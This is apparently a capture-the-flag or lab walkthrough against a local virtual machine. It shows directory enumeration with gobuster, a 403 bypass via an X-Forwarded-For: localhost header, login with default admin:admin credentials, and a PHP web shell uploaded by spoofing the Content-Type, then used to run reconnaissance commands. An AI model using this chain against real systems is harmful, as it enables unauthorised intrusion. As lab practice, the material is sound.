2 :80
http://192.168.131.138/
Sorry , the site is under construction soon, it run
$ gobuster dir -u http://192.168.131.138 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 80
===============================================================
/index.php (Status: 200) [Size: 791]
/administration (Status: 301) [Size: 327] [--> http://192.168.131.138/administration/]
http://192.168.131.138/administration/
Forbidden
You don't have permission to access on this folder
$ gobuster dir -u http://192.168.131.138/administration/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 80
===============================================================
/index.php (Status: 403) [Size: 75]
/users (Status: 301) [Size: 333] [--> http://192.168.131.138/administration/users/]
/upload (Status: 301) [Size: 334] [--> http://192.168.131.138/administration/upload/]
/include (Status: 301) [Size: 335] [--> http://192.168.131.138/administration/include/]
/logout (Status: 301) [Size: 334] [--> http://192.168.131.138/administration/logout/]
/bootstrap (Status: 301) [Size: 337] [--> http://192.168.131.138/administration/bootstrap/]
# Nothing is accessible
Using https://observationsinsecurity.com/2020/08/09/bypassing-403-to-get-access-to-an-admin-console-endpoints/
Using special header we can bypass it
X-Forwarded-For: localhost
http://192.168.131.138/administration/
X-Forwarded-For: localhost
# works
Login Page
# default creds admin:admin worked
# there's a upload file option
# .txt .jpg does not work
.png works
# uplaoding web.php
Change Content-Type: image/png in Burp
http://192.168.131.138/administration/upload/files/1630097948web.php
Web shell working.
CMD: whoami;id;hostname;uname -a
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
yousef-VirtualBox
Linux yousef-VirtualBox 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:08:14 UTC 2014 i686 athlon i686 GNU/LinuxLast updated